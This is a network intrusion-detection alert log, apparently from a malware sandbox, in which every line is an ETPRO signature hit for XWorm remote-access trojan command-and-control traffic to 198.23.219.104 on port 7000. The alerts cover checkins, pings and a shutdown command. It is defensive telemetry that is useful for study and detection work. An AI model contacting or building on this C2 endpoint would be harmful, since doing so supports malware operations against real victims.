2024-10-13T19:01:34.477345+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:38.152239+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:01:38.262957+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:38.390237+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:01:39.383490+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:39.383490+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:39.477201+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:44.477352+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:49.477446+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:53.095707+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:53.097464+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:01:54.477904+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:59.597150+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:04.480484+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:07.939520+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:07.940890+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:09.399936+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:09.399936+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:09.531652+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:14.476395+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:19.477476+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:22.782245+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:22.783942+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:24.475901+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:28.830663+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:28.832323+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:29.476294+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:34.476312+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.411926+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.411926+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.501106+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:40.922459+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:40.923936+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.012746+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.017723+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.719945+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:41.725337+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.830435+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:41.833112+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:44.476284+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:49.475644+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.031873+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.033371+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.124679+0200	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.414778+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.417035+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.514104+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.519248+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.607964+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.610876+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.613038+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.617084+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:54.475851+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:59.475736+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:01.578611+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:01.580014+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:04.491278+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.078619+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.082246+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:07.167155+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.168610+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:07.262861+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.265092+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:09.428549+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:09.428549+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:09.560616+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:14.491843+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:17.343599+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:17.348738+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:17.442659+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:17.448743+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:19.496920+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.531333+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.625393+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.670116+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.723688+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.731529+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.732441+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.775017+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.776004+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.953957+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.955379+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.050690+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:23.051992+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.181699+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:23.183461+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.279890+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.285081+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:24.510097+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:29.523241+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:30.500329+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:30.502024+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:31.557998+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:31.557998+0200	2853931	ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:31.557998+0200	2853954	ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:32.875118+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:32.876891+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:34.522772+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:34.652184+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:34.653709+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:35.765177+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:35.769751+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.016178+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.020434+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.781406+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.783111+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.878311+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.879917+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.968783+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.970203+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.998883+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.000297+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.098223+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.099952+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.194156+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.195777+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.434283+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.434283+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.571982+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:42.609049+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:42.611151+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:44.108830+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:44.115115+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:44.853754+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:44.854979+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:49.521847+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:51.484850+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:51.490292+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:54.521956+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:58.406779+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:58.414732+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.437502+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:59.440157+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.536181+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.541481+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.630268+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:03.218492+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:03.221148+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:04.522879+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:04.797907+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:04.799393+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:08.751591+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:08.753397+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:09.441171+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:09.441171+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:09.571579+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:14.521346+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:14.937113+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:14.941337+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:15.026057+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:15.027365+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:15.121442+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:15.122707+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:19.527105+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:20.312041+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:20.317237+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:24.218338+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:24.227813+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:24.521560+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.186626+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.189851+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.248410+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.250473+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.283748+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.285413+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.379334+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
